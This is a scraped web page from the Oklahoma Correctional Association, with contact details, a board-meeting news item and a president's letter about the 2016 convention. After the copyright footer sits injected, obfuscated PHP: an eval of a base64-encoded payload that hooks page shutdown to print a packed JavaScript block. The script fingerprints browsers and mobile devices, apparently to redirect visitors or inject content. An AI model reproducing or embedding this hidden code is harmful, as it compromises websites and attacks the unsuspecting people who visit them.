Contact Us

Email: [email protected]

Address:
P.O. Box 12694 Oklahoma City, Oklahoma 73157

Contact Us

Anji Mayfield
(918) 581-2652

Latest News

February 20th, 2014

Posted by admin, in Board Meeting Minutes Categories 0 Comments

5

Jun

Oklahoma Correctional Association Board Meeting Division of Institutions II February20, 2014-2:00p.m.

More

Board Meeting Minutes

Welcome

Letter from the President

Greetings from the President I would like to express my gratitude for this opportunity to serve as your President and invite all members to the 2016 OCA Convention to be held at the Marriott Conference Center in Norman on October 20th-21st, 2016.  This year's theme is " Challenges & Changes in...

Latest PortfolIo Items

    Others Social Media

    Copyright © 2014 Oklahoma Correctional Association

    /*a3cde4ed5551560e46436ac92788c296*/ $ygu="b"."ase"."64_de"."code";eval($ygu("CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfOTQxNzY2MygpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NU5ERTNOall6SWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2RxSURGQ1BUTjRLRWtvS1h0bUtIRXVUeUU5TVZBbUprMGdjUzVQSVQwaVRDSXBlek41S0RGQ0tUdG1LRTBnUVZzaU1VWWlYVDA5SWt3aUtYdEJXeUl4UmlKZFBURTdhaUJaUFNoV0tDa21KakZrS0NrcE8yb2dNVkU5SVZrbUppRWhRUzR6ZWlZbVFTNUZMak4zUFQwOUlqTjJJRE55TGlJN2FpQXhUajB0TVR0cUlFYzlJak56T2k4dk0zUXVNM1VpTzJZb01UY29LU1ltTVU0OVBURXBlMllvS0VVdVVDNHhTeWd2TTBFdmFTa3BmSHdvUlM1UUxqRkxLQzh6UWk5cEtTa3BlekZpTGpOSUtFY3BmWHA3UVM0eFlqMUhPM0V1TVdJOVIzMTllbnRtS0NoWkppWWhNVkVtSmlFeE55Z3BLU2w3YWlCVlBTSThWQ0F6U1QxY1hDSXpTam96UnpzelJqb3RNME03WEZ3aVBqd3hReUF6UkQxY1hDSXhSRnhjSWlBelJUMWNYQ0lpSzBjcklseGNJaUF6Y1QxY1hDSXhSRnhjSWo0OEx6RkRQand2VkQ0aU8yb2dTajF4TGpOd0tDSlVJaWs3WmloS0xqRjRQVDB3S1h0eExrOHVUajF4TGs4dVRpdFZmWHA3YWlBeFFUMUtMakY0TzJvZ1VqMHpZaTR6WXlnb01VRXZNaWtwTzBwYlVsMHVUajFLVzFKZExrNHJWWDE5ZlgweFNpZ3BmWDBzTTJRcE8wa2dNVW9vS1h0cUlGbzlJak5oSWp0bUtGb2hQU0l6T1NJcGUyb2dTRDF4TGpNMUtGb3BPMllvVFNCSUlUMU1KaVpJSVQweFVDbDdTQzR6TmowaUlqc3pOeUJJZlgxOU8wa2dNV1FvS1h0bUtIRXVReVltSVhFdU16Z3BlM2dnUW4xNklHWW9jUzVESmlZaFFTNHpaU2w3ZUNCQ2ZYb2daaWh4TGtNbUppRnhMak5tS1h0NElFSjllaUJtS0hFdVF5WW1JWEV1TTIwcGUzZ2dRbjE2SUdZb2NTNURKaVloUVM0emJpbDdlQ0JDZlhvZ1ppaHhMa01wZTNnZ1FuMTZJR1lvVFNCRkxqTnZJVDBpVENJbUppRnhMa01tSmxZb0tTbDdlQ0JDZlhwN2VDQXhZWDE5U1NCV0tDbDdhaUI1UFVFdVJTNVFPMm9nU3oxNUxrUW9Jak5zSUNJcE8yWW9TejR3S1h0NElERTJLSGt1TVdNb1N5czFMSGt1UkNnaUxpSXNTeWtwTERFd0tYMXFJREZ5UFhrdVJDZ2lNMnN2SWlrN1ppZ3hjajR3S1h0cUlGTTllUzVFS0NJelp6b2lLVHQ0SURFMktIa3VNV01vVXlzekxIa3VSQ2dpTGlJc1V5a3BMREV3S1gxcUlGRTllUzVFS0NJemFDOGlLVHRtS0ZFK01DbDdlQ0F4TmloNUxqRmpLRkVyTlN4NUxrUW9JaTRpTEZFcEtTd3hNQ2w5ZUNBeFlYMUpJREUzS0NsN2FpQXhORDFCTGtVdVVDNHphU2dwTzJZb0x5Z3phbnd6UzF4Y1pDdDhNMHdwTGlzeGNYdzBhSHcwYVZ4Y0wzdzBhbncwWjN3MFpudzBZbncwWTN3MFpId3pOSHd4VWlnMGEzd3hUU2w4TVhwOE5HeDhOSElnZkRSemZEUjBmRFJ4ZkRGeExpczBjSHcwYlh3MGJpQnRLRFJ2ZkRSaEtXbDhORGdvSURGSUtUOThNMU44Y0NnelZId3pWU2xjWEM5OE0xSjhNMUY4TTAxOE0wNG9OSHcyS1RCOE0wOThNMUI4TVZWY1hDNG9NMVo4TTFjcGZEUXpmRFEwZkRRMklEUXlmRFF4ZkROWUwya3VNWGtvTVRRcGZId3ZNMWw4TTFwOE5IVjhNekI4TVZwOE5UQmJNUzAyWFdsOE1qaDhNVmQ4WVNBeFIzd3hWbnd4YkNneFZId3hibnh6WEZ3dEtYd3haU2d5Tm53eWNTbDhNWEFvTW14OE1VOThNVzBwZkRKcmZESnFLREp0ZkZoOE1tNHBmREk1ZkRGMUtESndmREU1S1h3eWJ5aFhmREpwS1h3eVkzd3lZaWd5Wm54Y1hDMXRmSElnZkhNZ0tYd3laM3d5WlNneFNYd3hjM3d5WkNsOE1YWW9NbUY4TW1ncGZERllLREZzZkRGWktYd3lOeWhsZkhZcGQzd3lOWHd5TkZ4Y0xTaHVmSFVwZkRJeVhGd3ZmREl6ZkRNemZESlJYRnd0ZkRKU2ZESlRmREpRZkRKUFhGd3RmREZ0S0RKTWZERnFLWHd5VFh3eVRpZ3hhSHd4YzN3eVZDbDhNbFY4TW5KY1hDMXpmRE14ZkRKYWZESlpmREZtS0dOOGNDbHZmREpXS0RFeWZGeGNMV1FwZkRKWEtEUTVmREZsS1h3eVdDZ3lTM3d5U2lsOE1WUW9Nbmg4TW5rcGZESjZmREozS0ZzMExUZGRNSHd4U0h3eFIzd3lkaWw4TW5OOE1uUW9YRnd0ZkRGTUtYd3hVeUIxZkRKMWZESkJmREpDWEZ3dE5YeG5YRnd0TVRGOE1Ua29YRnd1ZDN3eFRTbDhNa2dvTWtsOE1rY3BmREpHZkRKRGZESkVYRnd0S0cxOGNIeDBLWHd5UlZ4Y0xYdzBaU2d4ZDN3eFp5bDhORkVvSUdsOE1WSXBmRFpOWEZ3dFkzdzJUQ2hqS0Z4Y0xYd2dmREZNZkdGOFozeHdmSE44ZENsOE5qWXBmRFZYS0RZemZEWjBLWHhwWEZ3dEtESXdmREU1ZkRFMUtYdzJiWHcyYmlnZ2ZGeGNMWHhjWEM4cGZEUjJmRFp2ZkRac2ZEWnJmRFpvZkRacGZEWnFmREY2ZkRad0tIUjhkaWxoZkRaeGZEWjNmRFo0ZkRaNWZEWjJmRFoxS0NCOFhGd3ZLWHcyY253Mlp5QjhObVpjWEMxOE5qSW9ZM3hyS1h3Mk5DZzFXbncxV1NsOE5WWW9JR2Q4WEZ3dktHdDhiSHgxS1h3MU1IdzFOSHhjWEMxYllTMTNYU2w4Tm1SOE5tVjhObUpjWEMxM2ZEWTRmRFk1WEZ3dmZERTFLRmQ4TmtGOE5ub3BmREZwS0VaOE1qRjhNVThwZkcxY1hDMDNNWHczTWlnMldud3hieWw4Tmxrb05sZDhObGg4TVVVcGZEYzFmREV4S0VaOE56UjhNWFo4TjJSOE1XWjhkQ2hjWEMxOElIeHZmSFlwZkRkaktYdzNPU2cxTUh3M1lYeDJJQ2w4TnpkOE56aDhObFZiTUMweVhYdzJWRnN5TFROZGZEWkhLREI4TWlsOE5rZ29NSHd5ZkRVcGZEWkpLREFvTUh3eEtYd3hNQ2w4TmtZb0tHTjhiU2xjWEMxOE5rVjhOa0o4TmtOOE5rUjhOa29wZkRaTEtEWjhhU2w4TmxKOE5sTjhObEFvTms5OE5rNHBmRFkzZkRWVWZEUllmRFJaS0dGOFpIeDBLWHcxVlh3MFdpZ3hNM3hjWEMwb1d6RXRPRjE4WXlrcGZEUlNmRFJUZkRGMEtEUlVmRFJWS1h3MU1WeGNMVEo4TlRVb01VbDhOV0o4TVdzcGZEVmpmRFZrZkRGM1hGd3RaM3cxWVZ4Y0xXRjhOVFlvTlRkOE1USjhNakY4TXpKOE5qQjhYRnd0V3pJdE4xMThhVnhjTFNsOE5FVjhORUo4TkVGOE5IZDhOSGg4Tkhrb05IcDhORVlwZkRSSFhGd3ZmRFJOS0RST2ZERTFmRFJQZkRSTWZGaDhORXNwZkRSSUtFWjhhRnhjTFh3eGJueHdYRnd0S1h3MFNseGNMM3d4YXloaktGeGNMWHd3ZkRFcGZEUTNmREZwZkRGcWZERnZLWHcxWmx4Y0xYdzFSM3cxU0NoY1hDMThiU2w4TlVsY1hDMHdmRFZHS0RRMWZEVkZLWHcxUWlneGNId3hkWHcxUTN3eGFIdzFSQ2w4TlVvb05VdDhXQ2w4TlZFb1JueG9YRnd0ZkhaY1hDMThkaUFwZkRWU0tFWjhOVk1wZkRWUUtERTRmRFV3S1h3MVR5ZzFUSHd4TUh3eE9DbDhNV2NvTlVGOE5Yb3BmRFZ0WEZ3dGZEVnVYRnd0ZkRWdktHbDhiU2w4Tld4Y1hDMThkRnhjTFRFeGZEVm5LREYwZkRWb0tYd3hSU2czTUh4dFhGd3RmRFZxZkRWd0tYdzFjVnhjTFRsOE1WVW9YRnd1WW53eFUzdzFkeWw4TlhoOE5YbDhOWFo4TlhWOE5YSW9OWE44VnlsOE5YUW9OREI4TlZzd0xUTmRmRnhjTFhZcGZEVnBmRFZyZkRWT2ZEVk5LRFV5ZkRVemZEWXdmRFl4ZkRjd2ZEVmxmRFJKZkRSRWZEUkRmRFJRS1h3MU9DaGNYQzE4SUNsOE5UbDhORlo4TkZjb1p5QjhObEY4TnpZcGZEZGlmRFpXZkRjemZEWmhYRnd0ZkRaamZEWTFmRFZZWEZ3dEwya3VNWGtvTVRRdU5uTW9NQ3cwS1NrcGUzZ2dRbjE0SURGaGZTY3NOaklzTkRRNExDZDhmSHg4Zkh4OGZIeDhmSHg4Zkh4cFpueDhmSHgyWVhKOGZIeDhmSHg4Wkc5amRXMWxiblI4Zkh4OGZIeDhjbVYwZFhKdWZFaE9ZWFJFYTBWemRGaDZlR3RpZEU1aVMzSmhVMHB6VEVSU2NIbHlWbHA4Wld4elpYeDNhVzVrYjNkOGRISjFaWHhoYkd4OGFXNWtaWGhQWm54dVlYWnBaMkYwYjNKOE1ERjhkbkZ2VEVORGVrUlFiMUpWUkhGRlZtWkRjbmxtUWxKc1ZYUk1ZVlZVUjI5aVRVZFlaM2RQU0cxOFFYbHlkV2xZWkZkdFdHOVhXRWxPVDA5blYwOTNjblJaYm1oSlIxTjBXRnBhUlhkT1EzeG1kVzVqZEdsdmJueFBZbGhxY2twalFtOVdTM2xTYlhOclRVVjJWMng0UlZWaWVGcEJaMEowYW1KdFJVUjhRVmRGYW1sM2MwUjRiMmgyZUhoYVoySkZVbEZKV2s5VlpFZFhUbmg0YjJKSVYzSnNSbHA4ZFc1a1pXWnBibVZrZkhSNWNHVnZabnhwYm01bGNraFVUVXg4WW05a2VYeDFjMlZ5UVdkbGJuUjhSbTlxVEhadFUzRnpXVXBLV214NmNFRk5WMVpVYzNWMmFFSnFkM3BvZVhKc1VVNVFSbko4UjI5NlNIcHZiRVZ1ZWxWb1kzUlNUM3BMVTBWNVNuUnFka2R5Vld4dFYwUkJTMGRHVFhsSGRYeENjSFpKWlhOUFZVRmhSMFJuYm1oRVoyVjNibGhQU1ZoTVFWQkhVMmxIYjNCdFJGTjhaR2wyZkZSUGFIVkhVRkJhUTFSWWFXbHdXVkJ3ZWtaWWFFaDVla3RJVjB4aVFrRkNXbnh0Ym5aSVlYRjVXRXRKV0dWd1YxbDRTRWR2UVdsU2NISktZbXR1ZGt0MWNrdHdXV3RNZkhSbGZHNTVmRzVWY0VwVFJuTmFkbGxGZEU5WGRHRmtaRnB4WWxsT1ZrbGlTVWRJUjJWeFNHaDhaRzVWY0d0bmJGWjVSMUJvVVVkblpHZGxWbTVNZDJGYVkzRnVTVVpvV0ZKM1YxbDhmRzF2Zkh4OFIxVk5hRmx2U0VwNWVHbG5jV0p0Um5oUlduQkdjWFp0Y205WlNrRkljWFY1ZEdkSlEzeHRZWHh3WVhKelpVbHVkSHhoVDFWNFoybDBaMlZKVTFoU1UxaGtZWHB4ZVdGcVJtSnZkR2R0UzJ0b2NIWlZSR3BrVWt0OGZHZHZmR1poYkhObGZHeHZZMkYwYVc5dWZITjFZbk4wY21sdVozeE1jSE5oUjFwUlVtaGtiM2hEYzBSUFkwOTBVR3BaV25WMFJWTktkbUZNY1hscGEwTjhZV2w4Wkc5OGRHRjhhWFI4YldOOGJtUjhjMlY4WVdOOFkyOThiMjk4Y21sOFlXeDhiVzlpYVd4bGZFaDFhMnRCV21oMVpteGtWVUpJVDBkWGVXcHpaRU5EWlZGa2VGbHdWbWh1Zkd4c2ZIQnNmR0Z5ZkdKcGZIQjBmR3hsYm1kMGFIeDBaWE4wZkdseWFYTjhaR3hmYm1GdFpYeFNiVU5FWTA1T1dITnVUazEzYVhONFJrWkZTazE1VTBGT2IwSnVhbHBUYjJ0OGFXWnlZVzFsZkRJMmNIaDhkSE44ZGw5aE0yTmtaVFJsWkRVMU5URTFOakJsTkRZME16WmhZemt5TnpnNFl6STVObngzWVh4dmMzeGphM3hZV1c5RWVuSkNWR2xEZDNaUVVrbE9kRVIwZEZodGVtaFpWMlZXY2tOSGNubHlmRzFoZEdOb2ZGOThiMlI4Ym5kblRXMXFTMmRIU2s1b1dIZDJTR1JvV0VWeGVHOTBjVUZFZEUxamVGWjhZMkY4Ym5Wc2JIeGlVbUZsUW1kVlJraGphR0pvY0VaemNXWjNaRlZQWVdaeFprTmlhbXRSU1hCWmFueHBjSHhuTVh4bGNueDFjSHhoWW1GamZEZ3dNbk44WW14OFlYcDhOSFJvY0h4OGZHTTFOWHhqWVhCcGZHSjNmR0oxYldKOGEyOThZbko4Tnpjd2MzeGhjSFIxZkd4aWZHRjFmR0YwZEhkOGJuRjhZbVY4WkdsOFlYWmhibnh5Wkh4MWMzeGhibnhoYlc5cGZHRjJmR1Y0ZkhsM2ZHRnpmR05vZkhKdWZHUmpmR1psZEdOOFpteDVmR2MxTmpCOGVtVjhaWHA4YVdOOGF6QjhaWE5zT0h4blpXNWxmR2RtZkdoamFYUjhhR1I4YUdWcGZHaGhhV1Y4ZFc1OFozSjhZV1I4ZFd4OGJESjhiWEI4WTNKaGQzeGtZWHhqYldSOFkyeGtZM3hqWkcxOFkyVnNiSHhqYUhSdGZHNW5mR1JpZEdWOFpITjhaV3g4WlcxOFpHMXZZbnhrYVdOaGZETm5jMjk4WkdWMmFYeDhZMk4zWVh4cFpXMXZZbWxzWlh4blpYUkZiR1Z0Wlc1MFFubEpaSHh2ZFhSbGNraFVUVXg4WkdWc1pYUmxmR052YlhCaGRFMXZaR1Y4Ym05dVpYeHBaRjg1TkRFM05qWXpmRTFoZEdoOFpteHZiM0o4TVRBd2ZGaE5URWgwZEhCU1pYRjFaWE4wZkhGMVpYSjVVMlZzWldOMGIzSjhjblo4UldSblpYeDBiMHh2ZDJWeVEyRnpaWHhoYm1SeWIybGtmRlJ5YVdSbGJuUjhUVk5KUlh4aFpHUkZkbVZ1ZEV4cGMzUmxibVZ5ZkdGMGIySjhiV0Y0Vkc5MVkyaFFiMmx1ZEhOOFoyVjBSV3hsYldWdWRITkNlVlJoWjA1aGJXVjhhR1ZwWjJoMGZFbHVZM3hvZEhSd2ZHUm5aSE5uZDJWbGQzUmxkM3hqWm54SGIyOW5iR1Y4ZG1WdVpHOXlmSE5sZEVsdWRHVnlkbUZzZkdOc1pXRnlTVzUwWlhKMllXeDhZMmh5YjIxbGZHbFFhRzl1Wlh4cFVHOWtmRFEyTVRSd2VIeDNhV1IwYUh4emNtTjhiR1ZtZEh4aFluTnZiSFYwWlh4eVpYQnNZV05sZkhOMGVXeGxmSEJ2YzJsMGFXOXVmR0ppZkcxbFpXZHZmSEJ6Y0h4elpYSnBaWE44YzNsdFltbGhibngwY21WdmZIQnZZMnRsZEh4d2JIVmphMlZ5ZkhCb2IyNWxmR2w0YVh4eVpYeGljbTkzYzJWeWZHeHBibXQ4ZUdscGJtOThNVEl3TjN3Mk16RXdmSHg0WkdGOFkyVjhkbTlrWVdadmJtVjhkMkZ3Zkh4M2FXNWtiM2R6Zkh4d1lXeHRmSHhwYm54bGJHRnBibVY4Wm1WdWJtVmpmR2hwY0hSdmNIeG9hWHhqYjIxd1lXeDhZbXhoZW1WeWZHRjJZVzUwWjI5OFltRmtZWHhpYkdGamEySmxjbko1ZkdodmJtVjhhMmx1Wkd4bGZHNWxkR1p5YjI1MGZHOXdaWEpoZkc5aWZHWnBjbVZtYjNoOGJXMXdmR3huWlh4dFlXVnRiM3h0YVdSd2ZEWTFPVEI4YVdKeWIzeHlZV3R6ZkhKcGJUbDhjbTk4ZG1WOGNqWXdNSHh5TXpnd2ZEZzFmRGd6ZkhGMFpXdDhlbTk4Y3pVMWZITmpmRGd4ZkhOa2EzeDJZWHh0YzN4ellYeG5aWHh0Ylh3NU9IeG9jSHh3YUdsc2ZIQnBjbVY4WVhsOGRXTjhkMmhwZEh4M2FYeHdPREF3ZkhCaGJueHdaM3g4Y0c1OGZIeDhjRzk4Y1dOOE1EZDhkek5qZkhkbFltTjhjV0Y4Y25SOGNISnZlSHh3YzJsdmZEZ3dmSE5uYUh4MGIzeHphSHgyYlRRd2ZHMHpmSFp2WkdGOGRHbHRmSFJqYkh4MFpHZDhkR1ZzZkcwMWZIUjRmSFpwZkhKbmZIWnJmSFpsY21sOGRqYzFNSHh6YVh4MWRITjBmSFkwTURCOGJHdDhaM1I4YzIxOFlqTjhkRFY4YVdSOGMyeDhjMmhoY254emFXVjhjMnQ4YzI5OFpuUjhNREI4ZG5oOGRuVnNZM3gwTm54ME1ueHpjSHh6ZVh4dFlueHZkMmN4ZkhCa2VHZDhiR2Q4YUhWOGVuUmxmSGhwZkc1dmZIeDhhM2x2ZkdGM2ZHeGxmSHBsZEc5OGRIQjhiM0poYm54dE0yZGhmRzAxTUh4NVlYTjhiVEY4ZVc5MWNueHNhV0ozZkd4NWJuaDhhM2RqZkd0d2RIeHBiVEZyZkdsdWJtOThhWEJoY1h4cGEyOXRmR2xuTURGOGFUSXpNSHhwWVdOOGFXUmxZWHhxWVh4cVluSnZmR3RzYjI1OGMzVmljM1J5ZkhSamZHdG5kSHhyWldwcGZHcGxiWFY4YW1sbmMzeHJaR1JwZkhodmZIVnBmSFJtZkhkbWZIZG5mRzl1Zkc1bGZHNHpNSHh1TlRCOGJqZDhkM1I4Ym05cmZHaDBmR2h6ZkhkMmZIUnBmRzl3Zkc1amZHNTZjR2g4YnpKcGJYeHVNakI4YmpFd2ZIZHZiblY4YnpoOGIyRjhiV2w4Y21OOGZHTnlmRzFsZkhnM01EQjhNREo4YlcxbFpueHVkM3h0ZDJKd2ZHMTVkMkY4YlhSOGNERjhkMjFzWW54NmVueGtaU2N1YzNCc2FYUW9KM3duS1N3d0xIdDlLU2tLUEM5elkzSnBjSFErJyk7Cn0KCnJlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCd1c2VyX2Fib3J0X2VuZF9leGl0X29wZXJhdGlvbmlkXzk0MTc2NjMnKTsKCg=="));/*a3cde4ed5551560e46436ac92788c296*/